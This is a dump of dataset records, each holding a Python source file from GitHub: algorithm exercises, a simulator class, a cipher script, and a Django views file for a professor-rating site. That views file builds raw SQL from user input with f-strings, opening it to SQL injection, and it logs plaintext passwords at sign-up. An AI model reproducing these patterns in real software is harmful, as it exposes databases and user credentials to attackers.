1\n\nprint(answer)\n","repo_name":"gaeunpark924/algorithm-study-python","sub_path":"2023/3월5주차/빙산.py","file_name":"빙산.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42018212429","text":"import Request\nimport Simulator\nimport numpy as np\n\nclass Resource:\n\n\tdef __init__(self, resource_id, simulator, boot_time, monitor, capacity=5):\n\t\tself.name = 'Resource_' + str(resource_id)\n\t\tself.simulator = simulator\n\t\tself.monitor = monitor\n\t\tself.capacity = capacity\n\t\tself.request_list = []\n\t\tself.available = self.capacity - len(self.request_list)\n\t\tself.boot_time = boot_time\n\t\tself.initialized = False\n\t\tself.start_time = 0\n\t\tprint('%3.4f, %s: Im booting up.' %(self.simulator.now, self.name))\n\n\tdef survey(self):\n\t\t# If the server is up and running\n\t\tif(self.initialized):\n\t\t\ttimeouts = [r.process_time for r in self.request_list]\n\t\t\tif(timeouts):\n\t\t\t\treturn min(timeouts)\n\t\t\telse:\n\t\t\t\treturn self.simulator.run_time\n\t\t# Still in boot-up\n\t\telse:\n\t\t\treturn self.boot_time\n\n\n\tdef arrival(self, request):\n\t\tself.request_list.append(request)\n\t\trequest.arrival_time = self.simulator.now\n\t\tself.update(1)\n\t\tprint('%3.4f, %s: I arrived to %s. %d slots available.' 
%(self.simulator.now, request.name, self.name, self.available))\n\n\tdef notify(self, time_step):\n\t\tif(self.initialized):\n\t\t\tfor r in self.request_list:\n\t\t\t\tr.process_time -= time_step\n\t\telse:\n\t\t\tself.boot_time -= time_step\n\n\tdef next_job(self):\n\t\tif(self.initialized):\n\t\t\ttimeouts = [r.process_time for r in self.request_list]\n\t\t\trequest_idx = np.argmin(timeouts)\n\t\t\trequest = self.request_list[request_idx]\n\t\t\tprint('%3.4f, %s: I\\'m leaving %s. %d slots available.' %(self.simulator.now, request.name, self.name, (self.available+1)))\n\t\t\tself.simulator.request_count += 1\n\t\t\trequest.departure_time = self.simulator.now\n\t\t\tself.monitor.observe_request(request)\n\t\t\tdel self.request_list[request_idx]\n\t\t\tself.update(-1)\n\t\telse:\n\t\t\tself.initialized = True\n\t\t\tself.start_time = self.simulator.now\n\t\t\tself.monitor.resource_init()\n\t\t\tprint('%3.4f, %s: Im ready to go.' %(self.simulator.now, self.name))\n\n\tdef update(self, change):\n\t\tself.available = self.capacity - len(self.request_list)\n\t\tif(len(self.request_list) - change == 0):\n\t\t\treturn\n\t\telse:\t\n\t\t\tfor r in self.request_list:\n\t\t\t\tcur_len = len(self.request_list) * 1.0\n\t\t\t\tprev_len = (len(self.request_list) - change) * 1.0\n\t\t\t\tnew_process_time = r.process_time * (cur_len / prev_len)\n\t\t\t\tr.process_time = new_process_time\n\n\tdef shutdown(self):\n\t\tself.monitor.resource_shut(self)","repo_name":"altugkarakurt/EnergyEfficientCapacityManagement","sub_path":"classes/Resource.py","file_name":"Resource.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10312344574","text":"from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path('', views.main, name=\"main\"),\n path('personal_cabinet/', views.personal_cabinet, name=\"personal_cabinet\"),\n path('change_profile/', views.change_profile, name=\"change_profile\"),\n path('create_site/', views.create_site, name=\"create_site\"),\n path('//', views.site_view, name=\"site_origin\"),\n path('//', views.site_view, name=\"site\"),\n path('register/', views.register_user, name=\"registration\"),\n path('login/', views.login_user, name=\"login\"),\n path('logout/', views.logout_view, name=\"logout\"),\n]","repo_name":"NackiE23/vpn-service","sub_path":"core/vpn_service/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28616169743","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> Optional[TreeNode]:\n val_to_index = {x:i for i,x in enumerate(inorder)}\n \n def construct(i1,i2,j1,j2):\n if i1 > i2 or j1 > j2:\n return None\n \n root = TreeNode(preorder[i1])\n mid = val_to_index[preorder[i1]] - val_to_index[inorder[j1]]\n root.left = construct(i1 + 1,i1+mid,j1,j1+mid-1)\n root.right = construct(i1+mid+1,i2,j1+mid+1,j2)\n return root\n \n return construct(0,len(preorder)-1,0,len(inorder)-1)\n","repo_name":"amanuel1271/Problem-Solving","sub_path":"105-construct-binary-tree-from-preorder-and-inorder-traversal/105-construct-binary-tree-from-preorder-and-inorder-traversal.py","file_name":"105-construct-binary-tree-from-preorder-and-inorder-traversal.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"28022860809","text":"#http://www.science.smith.edu/~nhowe/teaching/csc151/hw/hw1/\n#### using code from https://www.kite.com/python/docs/sys.stdout\nimport sys\nsys.stdout.write(\"Output\") \n####\n\n\ndef shiftLetter(letter, numshifts):\n asciilett = ord(letter) \n \n if (asciilett >= 65) and (asciilett <= 90): #for uppercase letters\n shiftedascii = (asciilett + numshifts) \n if (shiftedascii > 90): #incase the shifted values needs to wrap around the alphabet in encrypting\n x = shiftedascii - 90\n shiftedascii = x + 64\n if (shiftedascii < 65): #incase the shifted values needs to wrap around the alphabet in decrypting\n x = 65 - shiftedascii\n shiftedascii = 91 - x \n else:\n shiftedascii = shiftedascii \n return chr(shiftedascii)\n\n elif (asciilett >= 97) and (asciilett <= 122): #for lowercase letter\n shiftedascii = (asciilett + numshifts) \n if (shiftedascii > 122): #incase the shifted values needs to wrap around the alphabet in encrypting\n x = shiftedascii - 122\n shiftedascii = x + 96\n if (shiftedascii < 97): #incase the shifted values needs to wrap around the alphabet in decrypting\n x = 97 - shiftedascii\n shiftedascii = 123 - x \n else:\n shiftedascii = shiftedascii \n return chr(shiftedascii)\n else:\n return chr(asciilett) \n\n\ndef shiftMessage(message, padshifts):\n msglist = list(message) \n for i in range (0, len(msglist)):\n x = shiftLetter(msglist[i], padshifts[i]) #applies shiftLetter() for each character in the msglist\n x = str(x) \n msglist[i] = x #this replaces the list item with its shifted verison \n encry = \"\".join(msglist)\n return encry\n\n\n#returns the encrypted message using 
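The route names in the urls.py record above (`site_origin`, `site`, `registration`, ...) let views and templates build URLs with `reverse()` instead of hard-coded paths. Note the `path()` strings for the two site routes appear to have lost their `<converter>` segments during extraction (both show as `'//'`), so the argument names below are assumptions, not recovered from the record:

```python
# Sketch only: resolving a named route from the record's urlpatterns.
# The two positional args assume the original pattern was something
# like path('<user>/<site>/', views.site_view, name="site").
from django.urls import reverse

def site_url(user, site) -> str:
    return reverse('site', args=[user, site])
```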
shifMessage() \ndef encipher(message):\n return shiftMessage(message, padshifts)\n\n\n#this negates each of the values in our padshifts list so that shiftMessage() can use it as an arguement to decrypt the message \ndef decipher(message):\n for i in range (0, len(padshifts)): \n padshifts[i] = padshifts[i] * -1 \n return shiftMessage(message, padshifts)\n\n\nmsg = ''' \"[C]ro eorcc hlhaz bb q dgumqr jldsl dt xdir ckbcuszao, wryw gg, yexnc mljdqtbbbe. Iwo biawc U udkbvl, tq N'o joubveszpm, phuqux pmze hpek vpdwfj. Kgxctr uxuh mmnt qzjo, wlt fn tcpj-nsfmgzhs.\" -- Txykv Jqjsvegy, \"rkr Oquvhy fy dki Ybuokwal,\" GHZM wbpvoh, mghhcceo vi Igpdhwpr-Ully Obwlpkcu (HIB), EZLXZ, xez PVWUEX, z yuquidlxqji afdcrbxi lor wvzakwll. [zhuid://afv.bi/2SjZpaY] '''\n\n#reads the pad file as a string to the variable 'pad'\nwith open('pad.txt', 'r') as file:\n pad = file.read()\n\n\n#creates the list 'padlist' with the number of shifts from each pad character\npadlist = list(pad)\npadshifts = [] \nfor s in padlist:\n num = ord(s)\n num = num - 65\n padshifts.append(num)\n\n\ndef mains(): \n #### using code from https://www.kite.com/python/docs/sys.stdout\n sys.stdout = open(\"deciphered.txt\", \"w\")\n\n encrypted = encipher(msg)\n print(\"Encrypted: \" + encrypted + \"\\n\")\n decrypted = decipher(encrypted)\n print(\"decrypted: \" + decrypted + \"\\n\")\n \n sys.stdout.close()\n ####\n\n\n\nif __name__ == \"__main__\":\n mains()\n\n\n\n\n","repo_name":"lesslyortiz/Caesar-Cipher-Project","sub_path":"cipher.py","file_name":"cipher.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42416940522","text":"from dataclasses import dataclass\n\nfrom ._base import ConfigTable\n\n\n@dataclass\nclass SangvisInAllyInstance:\n id: int # 1\n sangvis_id: int # 1001\n sangvis_level: int # 90\n life: int # 100\n sangvis_advance: int # 4\n sangvis_shape_n: int # 1\n sangvis_resolution_level: int # 3\n skill1: int # 8\n skill2: int # 1\n skill3: int # 5\n skill_advance: int # 0\n chip1: int # 1003\n chip2: int # 1001\n favor: int # 90000\n\n\nclass SangvisInAlly(ConfigTable):\n name = \"sangvis_in_ally\"\n\n def add_instance(self, k):\n return SangvisInAllyInstance(**self._data[k])\n","repo_name":"gf-data-tools/gf-utils","sub_path":"gf_utils/gamedata/table/sangvis_in_ally.py","file_name":"sangvis_in_ally.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"21754595821","text":"import re\nfrom django.shortcuts import render\nfrom scipy.fftpack import idct\nfrom .models import *\nfrom django.contrib.auth import logout, login, authenticate\nfrom django.contrib.auth.models import User\nfrom main.updating_scores import update_scores\nfrom django.db.models import Avg, Sum, Count\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.decorators import login_required\nfrom .decorators import *\nfrom django.conf import settings\nimport requests\nfrom django.contrib import messages\nfrom json import loads\nfrom django.http import JsonResponse\nfrom django.db.models import Q\nfrom django.views.decorators.http import require_http_methods\nfrom .db import DB_connect\nfrom django.core.mail import send_mail\nimport os\nfrom twilio.rest import Client\nfrom datetime import datetime\nfrom .classification import predict\n\n\ndef home(request):\n return render(request, './index.html')\n\n\ndef search(request):\n return 
redirect('home')\n\n\ndef labeled_reviews(request):\n db, cursor = DB_connect()\n\n cursor.execute(f'''\n SELECT count(*) as count\n FROM user_faculty_rev\n WHERE helpful = 0;\n ''')\n total = cursor.fetchone()\n\n cursor.execute(f'''\n SELECT review, employee_id, user_id, teaching_quality, difficulty_rating, overall_rating, student_thoughts\n FROM user_faculty_rev\n WHERE helpful = 0;\n ''')\n reviews = cursor.fetchall()\n\n context = {\n 'count': total['count'],\n 'reviews': reviews,\n }\n\n cursor.close()\n db.close()\n\n return render(request, 'labeled_reviews.html', context)\n\n@login_required(login_url='sign_in')\ndef rate(request, item, id):\n db, cursor = DB_connect()\n\n if item == 'instructor':\n cursor.execute(f'''\n SELECT fname, lname\n FROM Employee\n WHERE employee={id};\n ''')\n ins = cursor.fetchone()\n\n cursor.execute(f'''\n SELECT C.course, C.course_name\n FROM Employee E\n JOIN Department D\n ON E.department_id = D.department\n JOIN Course C\n ON C.course DIV 1000 = D.department\n WHERE employee={id};\n ''')\n courses = cursor.fetchall()\n\n context = {\n 'item': item,\n 'id': id,\n 'fname': ins['fname'],\n 'lname': ins['lname'],\n 'courses': courses\n }\n\n elif item == 'course':\n cursor.execute(f'''\n SELECT course_name\n FROM Course\n WHERE course={id};\n ''')\n course = cursor.fetchone()\n\n context = {\n 'item': item,\n 'id': id,\n 'course_name': course['course_name'],\n }\n\n elif item == 'dept':\n cursor.execute(f'''\n SELECT dept_name\n FROM Department\n WHERE department={id};\n ''')\n dept = cursor.fetchone()\n\n context = {\n 'item': item,\n 'id': id,\n 'dept_name': dept['dept_name'],\n }\n\n cursor.close()\n db.close()\n\n return render(request, 'rate.html', context)\n\n\n@login_required(login_url='sign_in')\ndef submit_rate(request, item, id):\n uname = request.user.username\n user = User.objects.get(username=uname)\n\n if request.method == 'POST':\n recaptcha_response = request.POST['g-recaptcha-response']\n data = {\n 'secret': settings.GOOGLE_RECAPTCHA_SECRET_KEY,\n 'response': recaptcha_response\n }\n verify = requests.post('https://www.google.com/recaptcha/api/siteverify', data=data)\n status = verify.json()\n\n if status['success']:\n if item == 'instructor':\n course_val = request.POST.get('course', '0')\n if str.isdigit(course_val):\n course_code = course_val\n try:\n course_instance = Course.objects.get(course=course_code)\n except:\n return render(request, './error.html')\n else:\n course_name = course_val\n try:\n course_instance = Course.objects.get(course_name=course_name)\n except:\n return render(request, './error.html')\n\n quality = request.POST['quality']\n difficulty = request.POST['difficulty']\n overall_rate = request.POST['rate']\n workload = request.POST.getlist('workload')\n personality = request.POST.getlist('personality')\n misc = request.POST.getlist('misc')\n comment = request.POST['comment']\n\n helpful = 1\n if comment != None and len(comment) != 0:\n helpful = predict(comment)\n\n try:\n em = Employee.objects.get(employee=id)\n u_rate = UserFacultyRev.objects.create(\n overall_rating=overall_rate, difficulty_rating=difficulty,\n student_thoughts=comment, helpful=helpful,\n teaching_quality=quality, course_id=course_instance.course,\n employee_id=em.employee, user_id=user.id\n )\n\n # Create records for workload, personality, and misc\n try:\n # insert each element\n for element in workload:\n FacultyWorkload.objects.create(employee=em, workload=element, user=user, review=u_rate)\n for element in personality:\n 
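The same reCAPTCHA round-trip (read `g-recaptcha-response`, POST it to Google's siteverify endpoint, branch on `success`) reappears in `submit_rate`, `sign_in`, and `sign_up` in this views.py record. A sketch of factoring it out; the helper name `recaptcha_ok` is hypothetical, while the endpoint and settings key come from the record itself:

```python
import requests
from django.conf import settings

# Sketch: one helper instead of three copies of the verification code.
def recaptcha_ok(request) -> bool:
    """Return True when Google verifies the token posted by the form."""
    token = request.POST.get('g-recaptcha-response', '')
    resp = requests.post(
        'https://www.google.com/recaptcha/api/siteverify',
        data={'secret': settings.GOOGLE_RECAPTCHA_SECRET_KEY,
              'response': token},
        timeout=5,  # avoid hanging the request on a slow upstream
    )
    return resp.json().get('success', False)
```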
FacultyPersonality.objects.create(employee=em, personality=element, user=user,\n review=u_rate)\n for element in misc:\n FacultyMiscellaneous.objects.create(employee=em, miscellaneous=element, user=user,\n review=u_rate)\n except:\n print('Failed to insert tags')\n\n try:\n # after each rate\n # Updates the teaching quality, exams difficulty, and overall rating scores\n update_scores(id)\n # similar_professors()\n except:\n print('Could not update scores')\n except:\n print('Could not review')\n\n elif item == 'course':\n db, cursor = DB_connect()\n\n enjoyment = request.POST['enjoyment']\n effort = request.POST['effort']\n overall_rate = request.POST['rate']\n tags = request.POST.getlist('tag')\n comment = request.POST['comment']\n\n cursor.execute(f'''\n INSERT INTO user_course_rev(user_id, course_id, enjoyment_rating, effort_required, overall_rating, student_thoughts)\n VALUES({request.user.id}, {id}, {enjoyment}, {effort}, {overall_rate}, '{comment}');\n ''')\n\n cursor.execute(f'''\n SELECT LAST_INSERT_ID() as review;\n ''')\n review = cursor.fetchone()['review']\n\n for t in tags:\n cursor.execute(f'''\n INSERT INTO Course_tags(course_id, review_id, tag)\n VALUES({id}, {review}, '{t}');\n ''')\n\n cursor.close()\n db.close()\n\n elif item == 'dept':\n db, cursor = DB_connect()\n\n support = request.POST['support']\n act = request.POST['act']\n overall_rate = request.POST['rate']\n comment = request.POST['comment']\n\n cursor.execute(f'''\n INSERT INTO user_dept_rev(user_id, department_id, support_rating, activities_rating, overall_rating, student_thoughts)\n VALUES({request.user.id}, {id}, {support}, {act}, {overall_rate}, '{comment}');\n ''')\n\n cursor.close()\n db.close()\n\n context = {\n 'item': item,\n 'id': id,\n }\n\n return render(request, 'reviewSubmitted.html', context)\n\n\ndef course(request, id):\n db, cursor = DB_connect()\n\n cursor.execute(f'''\n SELECT C.course_name, D.dept_name, C.overall_rating\n FROM Course C\n JOIN Department D\n ON C.course DIV 1000 = D.department\n WHERE course={id};\n ''')\n course = cursor.fetchone()\n\n cursor.execute(f'''\n SELECT count(*) as rev_count, sum(overall_rating) as sum\n FROM user_course_rev\n WHERE course_id={id};\n ''')\n rev_count = cursor.fetchone()\n\n cursor.execute(f'''\n SELECT student_thoughts, enjoyment_rating, effort_required, upvotes, downvotes\n FROM user_course_rev\n WHERE course_id={id};\n ''')\n reviews = cursor.fetchall()\n\n context = {\n 'course': id,\n 'course_name': course['course_name'],\n 'dept_name': course['dept_name'],\n 'overall_rating': rev_count['sum'] / rev_count['rev_count'],\n 'rev_count': rev_count['rev_count'],\n 'reviews': reviews,\n }\n\n cursor.close()\n db.close()\n\n return render(request, 'course.html', context)\n\n\ndef dept(request, id):\n db, cursor = DB_connect()\n\n cursor.execute(f'''\n SELECT dept_name, overall_rating, admin_support, activities\n FROM Department\n WHERE department={id};\n ''')\n dept = cursor.fetchone()\n\n cursor.execute(f''' \n SELECT count(*) as rev_count, sum(overall_rating) as sum_overall, sum(activities_rating) as sum_activities, sum(support_rating) as sum_support\n FROM user_dept_rev\n WHERE department_id={id};\n ''')\n rev_count = cursor.fetchone()\n\n cursor.execute(f'''\n SELECT student_thoughts, upvotes, downvotes\n FROM user_dept_rev\n WHERE department_id={id};\n ''')\n reviews = cursor.fetchall()\n\n context = {\n 'department': id,\n 'dept_name': dept['dept_name'],\n 'overall_rating': rev_count['sum_overall'] / rev_count['rev_count'],\n 'admin_support': 
rev_count['sum_support'] / rev_count['rev_count'],\n 'activities': rev_count['sum_activities'] / rev_count['rev_count'],\n 'rev_count': rev_count['rev_count'],\n 'reviews': reviews,\n }\n\n cursor.close()\n db.close()\n\n return render(request, 'dept.html', context)\n\n\ndef test_comments(request):\n f = open('data.json', 'r')\n print(f)\n data = loads(f.read())\n f.close()\n\n result = {\n 'comm': data,\n }\n\n return render(request, './comm.html', result)\n\n\ndef test(request):\n profs = Employee.objects.all()\n return render(request, './index_old.html', {\"Profs\": profs})\n\n\ndef test2(request):\n q = request.POST.get('q')\n\n if q:\n results = Employee.objects.all()\n urls = {}\n\n for e in results:\n urls[e.employee] = '/professor/' + str(e.employee)\n\n return render(request, './search_results_htmx.html', {\"results\": results, \"urls\": urls})\n\n return render(request, './blank.html')\n\n\n# the function takes the query result and the cursor description of an executed query\n# converts from a tuple-like notation to dictionary-like notation\n# needed for each custom query executed\n# Not needed if django ORM is used\ndef convert_to_dictionary(cursor_description, query_result):\n total_count = 0\n returning_value = []\n for r in query_result:\n total_count += 1\n i = 0\n d = {}\n while i < len(cursor_description):\n d[cursor_description[i][0]] = r[i]\n i += 1\n returning_value.append(d)\n return returning_value, total_count\n\n\ndef Round(obj, decimal):\n for element in obj:\n tmp = element.overall_rating\n element.overall_rating = round(tmp, decimal)\n return obj\n\n\ndef Round_get(obj, dec):\n tmp = obj.overall_rating\n obj.overall_rating = round(tmp, dec)\n return obj\n\n\n@require_http_methods([\"POST\"])\ndef searchResults(request):\n db, cursor = DB_connect()\n\n # Provide fuzzy matching\n # Executed only once in order to add the indexes to the DB\n # cursor.execute('CREATE FULLTEXT INDEX name ON Employee(fname, lname) WITH PARSER NGRAM;')\n # cursor.execute('CREATE FULLTEXT INDEX cname ON Course(course_name) WITH PARSER NGRAM;')\n\n input = request.POST['input']\n\n cursor.execute(f'''\n SELECT E.employee, E.fname, E.lname, D.dept_name, ROUND(E.overall_rating, 2) as overall_rating\n FROM Employee E\n JOIN Department D\n ON E.department_id = D.department\n WHERE MATCH(fname, lname) AGAINST('{input}' IN NATURAL LANGUAGE MODE);\n ''')\n employee = cursor.fetchall()\n\n cursor.execute(f'''\n SELECT C.course, C.course_name, D.dept_name, ROUND(C.overall_rating, 2) as overall_rating\n FROM Course C\n JOIN Department D\n ON C.course DIV 1000 = D.department\n WHERE MATCH(course_name) AGAINST('{input}' IN NATURAL LANGUAGE MODE);\n ''')\n courses = cursor.fetchall()\n\n context = {\n 'employee': employee,\n 'courses': courses,\n 'next': request.POST['next'], # redirect to the rating form or to the reviews page\n }\n\n cursor.close()\n db.close()\n\n return render(request, './searchResults.html', context)\n\n\ndef professorTwo(request, prof_name):\n print(prof_name)\n name = prof_name.split(' ')\n first_name = name[0]\n second_name = name[1]\n query = Employee.objects.filter(fname=first_name, lname=second_name).get()\n print(query)\n return HttpResponse(status=200)\n\n\ndef professor(request, prof_id=None):\n # for all the custom queries executed!\n # cursors return the query result in the form of a tuple\n # needs to be converted to dictionary-like notation\n # that is what the loop does\n faculty_id = prof_id\n prof = Employee.objects.get(employee=faculty_id)\n prof = Round_get(prof, 
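`searchResults` below interpolates the posted search string straight into the `MATCH ... AGAINST` clause with an f-string, which is an SQL-injection risk; elsewhere the record already passes parameters separately (`cursor.execute(deletion_query, data)`). A sketch of the same full-text search with a bound parameter, assuming `DB_connect` returns a MySQL-style cursor as that usage suggests:

```python
# Sketch: bind the search term as a parameter so a crafted input
# cannot change the SQL statement.
def search_employees(cursor, term):
    cursor.execute(
        """
        SELECT E.employee, E.fname, E.lname, D.dept_name,
               ROUND(E.overall_rating, 2) AS overall_rating
        FROM Employee E
        JOIN Department D ON E.department_id = D.department
        WHERE MATCH(fname, lname) AGAINST(%s IN NATURAL LANGUAGE MODE);
        """,
        (term,),
    )
    return cursor.fetchall()
```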
2)\n em = Employee.objects.get(employee=faculty_id)\n overall_rating = em.overall_rating\n recommended_percentage = (overall_rating * 100) / 5\n recommended_percentage = round(recommended_percentage, 2)\n\n rev_count = UserFacultyRev.objects.filter(employee_id=prof).aggregate(Count('review'))\n rev_count = rev_count['review__count']\n\n sim_prof = []\n sim = em.similarfaculty_set.all()\n get_similar = []\n for i in range(0, len(sim)):\n get_similar.append(sim[i].similar_faculty)\n\n for ele in get_similar:\n sim_prof.append(Employee.objects.get(employee=ele))\n\n sim_prof = Round(sim_prof, 2)\n\n # get all revs\n reviews = UserFacultyRev.objects.filter(employee_id=faculty_id).order_by('-helpful', '-review')\n\n workload = FacultyWorkload.objects.filter(employee_id=prof).values('workload').distinct()\n misc = FacultyMiscellaneous.objects.filter(employee_id=prof).values('miscellaneous').distinct()\n personality = FacultyPersonality.objects.filter(employee_id=prof).values('personality').distinct()\n\n result = {\n 'prof': prof,\n 'similar_professors': sim_prof,\n 'revs': reviews,\n 'rev_count': rev_count,\n 'avg': recommended_percentage,\n 'workload': workload,\n 'misc': misc,\n 'personality': personality\n }\n return render(request, './professor.html', result)\n\n\n@login_required(login_url='sign_in')\ndef queue(request):\n # we need professor id and user id\n user_id = request.user.id\n user = User.objects.get(id=user_id)\n p = Employee.objects.filter(users=user)\n prof = Round(p, 2)\n\n result = {\n 'professors': prof\n }\n return render(request, './queue.html', result)\n\n\n@csrf_exempt\n@login_required(login_url='sign_in')\ndef add_to_queue(request):\n if request.method == 'POST':\n prof_id = request.POST.get('prof_id', None)\n faculty_id = prof_id\n uname = request.user.username\n user = User.objects.get(username=uname)\n try:\n e = Employee.objects.get(employee=faculty_id)\n emp = Employee.objects.filter(users=user)\n for element in emp:\n if element == e:\n return HttpResponse(status=400)\n except:\n print('Error here')\n user_id = user.id\n try:\n if prof_id is not None:\n user = User.objects.get(id=user_id)\n faculty = Employee.objects.get(employee=faculty_id)\n faculty.users.add(user)\n msg = f'Successfully Returning from adding prof to queue: {prof_id}'\n else:\n msg = \"prof_id is none\"\n except:\n print('Failed to insert')\n msg = f'Failed from adding prof to queue: {prof_id}'\n return HttpResponse(msg)\n return HttpResponse('Failed')\n\n\n@csrf_exempt\n@login_required(login_url='sign_in')\ndef remove_from_queue(request, prof_id=None):\n if prof_id is None:\n msg = 'Professor id is None: Fix the error'\n return HttpResponse(msg)\n print('Removing a professor from queue')\n # print(prof_id)\n faculty_id = prof_id\n uname = request.user.username\n # print(uname)\n user = User.objects.get(username=uname)\n user_id = user.id\n # print(f'{user_id} and {faculty_id}')\n try:\n db, cursor = DB_connect()\n\n deletion_query = \"DELETE FROM Employee_users WHERE user_id=%s AND employee_id=%s\"\n data = (user_id, faculty_id)\n cursor.execute(deletion_query, data)\n print('executed successfully')\n\n cursor.close()\n db.close()\n\n except:\n print('Error')\n return HttpResponse(status=200)\n\n\n@unauthenticated_user\ndef sign_in(request):\n if request.method == 'POST':\n recaptcha_response = request.POST['g-recaptcha-response']\n data = {\n 'secret': settings.GOOGLE_RECAPTCHA_SECRET_KEY,\n 'response': recaptcha_response\n }\n verify = 
requests.post('https://www.google.com/recaptcha/api/siteverify', data=data)\n status = verify.json()\n\n print(status)\n\n if status['success']:\n username = request.POST['username']\n passw = request.POST['password']\n\n # print(f'user email is {username} and the password is {passw}')\n user = authenticate(request, username=username, password=passw)\n\n if user is not None:\n # print('HEy HO')\n login(request, user, backend='django.contrib.auth.backends.ModelBackend')\n # print('Yo YO')\n return redirect('dashboard')\n else:\n return render(request, './signin.html')\n else:\n messages.error(request, 'Invalid reCAPTCHA. Please try again.')\n\n return render(request, './signin.html')\n\n@unauthenticated_user\ndef sign_up(request):\n if request.method == 'POST':\n print('Here')\n recaptcha_response = request.POST['g-recaptcha-response']\n data = {\n 'secret': settings.GOOGLE_RECAPTCHA_SECRET_KEY,\n 'response': recaptcha_response\n }\n verify = requests.post('https://www.google.com/recaptcha/api/siteverify', data=data)\n status = verify.json()\n\n print(status)\n\n if status['success']:\n print('Heree')\n fname = request.POST['fname']\n lname = request.POST['lname']\n username = request.POST['username']\n user_email = request.POST['email']\n passw = request.POST['password']\n major = request.POST['major']\n\n print(f'Record: {fname}, {lname}, {username}, {user_email}, {passw}, {major}')\n\n\n try:\n print('Here')\n User.objects.create_user(password=passw, username=username, first_name=fname, last_name=lname,\n email=user_email)\n print('Got here')\n return redirect('sign_in')\n except:\n return render(request, './error.html')\n else:\n messages.error(request, 'Invalid reCAPTCHA. Please try again.')\n return render(request, './signup.html')\n\n\ndef logoutUser(request):\n logout(request)\n return redirect('home')\n\n\n@login_required(login_url='sign_in')\ndef rate_course(request):\n return render(request, './rateCourse.html')\n\n\n@login_required(login_url='sign_in')\ndef dashboard(request):\n uname = request.user.username\n user = User.objects.get(username=uname)\n user_obj = User.objects.get(id=user.id)\n revs = UserFacultyRev.objects.filter(user_id=user_obj).distinct()\n rev_result = []\n for i in range(len(revs)):\n rev_result.append(Employee.objects.get(employee=revs[i].employee.employee))\n\n # print(user_obj)\n rev_result = Round(rev_result, 2)\n zipped_response = zip(rev_result, revs)\n content = {\n 'user': user_obj,\n 'revs': zipped_response\n }\n return render(request, './dashboard.html', content)\n\n\n@login_required(login_url='sign_in')\ndef like(request):\n if request.method == \"POST\":\n uname = request.user.username\n user = User.objects.get(username=uname)\n user_id = user.id\n print(f'UserID is {user_id}')\n rev_id = request.POST.get('rev_id', None)\n print(f'Rev id is {rev_id}')\n try:\n print('Here 1 - Check if user has already interacted with the button')\n try:\n get_rev = UserReactFaculty.objects.get(review_id=rev_id, user_id=user_id)\n if get_rev.downvote == 1:\n print('Here 2')\n UserReactFaculty.objects.filter(review_id=rev_id, user_id=user_id).update(downvote=0)\n UserReactFaculty.objects.filter(review_id=rev_id, user_id=user_id).update(upvote=1)\n rev = UserFacultyRev.objects.get(review=rev_id)\n dislikes = rev.downvotes\n likes = rev.upvotes\n UserFacultyRev.objects.filter(review=rev_id).update(downvotes=dislikes - 1)\n UserFacultyRev.objects.filter(review=rev_id).update(upvotes=likes + 1)\n\n if get_rev.upvote == 1:\n # User Already liked this review\n # Remove 
like\n record = UserReactFaculty.objects.get(review_id=rev_id, user_id=user_id)\n try:\n record.delete()\n print('Record Deleted')\n except:\n print('Could not delete record')\n print('Here')\n rev = UserFacultyRev.objects.get(review=rev_id)\n likes = rev.upvotes\n UserFacultyRev.objects.filter(review=rev_id).update(upvotes=likes - 1)\n except:\n print('First time executing this')\n UserReactFaculty.objects.create(upvote=1, review_id=rev_id, user_id=user_id)\n\n rev = UserFacultyRev.objects.get(review=rev_id)\n likes = rev.upvotes\n UserFacultyRev.objects.filter(review=rev_id).update(upvotes=likes + 1)\n\n except RuntimeError:\n print('Could not execute')\n\n rev = UserFacultyRev.objects.get(review=rev_id)\n likes = rev.upvotes\n dislikes = rev.downvotes\n json_response = {\n 'likes': likes,\n 'dislikes': dislikes\n }\n return JsonResponse(json_response)\n\n msg = \"Could not like the review\"\n return HttpResponse(msg)\n\n\n@login_required(login_url='sign_in')\ndef dislike(request):\n if request.method == \"POST\":\n rev_id = request.POST.get('rev_id', None)\n uname = request.user.username\n user = User.objects.get(username=uname)\n user_id = user.id\n print(f'UserID is {user_id}')\n print(f'Rev id is {rev_id}')\n # First, check if the user has liked that review\n try:\n try:\n print('Here 1')\n get_rev = UserReactFaculty.objects.get(review_id=rev_id, user_id=user_id)\n if get_rev.upvote == 1:\n print('Here 2')\n UserReactFaculty.objects.filter(review_id=rev_id, user_id=user_id).update(upvote=0)\n UserReactFaculty.objects.filter(review_id=rev_id, user_id=user_id).update(downvote=1)\n rev = UserFacultyRev.objects.get(review=rev_id)\n dislikes = rev.downvotes\n likes = rev.upvotes\n UserFacultyRev.objects.filter(review=rev_id).update(downvotes=dislikes + 1)\n UserFacultyRev.objects.filter(review=rev_id).update(upvotes=likes - 1)\n\n if get_rev.downvote == 1:\n # User Already disliked this review\n # Remove dislike\n record = UserReactFaculty.objects.get(review_id=rev_id, user_id=user_id)\n try:\n record.delete()\n print('Record Deleted')\n except:\n print('Could not delete record')\n print('Here')\n rev = UserFacultyRev.objects.get(review=rev_id)\n dislikes = rev.downvotes\n UserFacultyRev.objects.filter(review=rev_id).update(downvotes=dislikes - 1)\n\n except:\n # Means the user has not liked that review\n print('First time interacting with the button')\n UserReactFaculty.objects.create(downvote=1, review_id=rev_id, user_id=user_id)\n\n rev = UserFacultyRev.objects.get(review=rev_id)\n dislikes = rev.downvotes\n 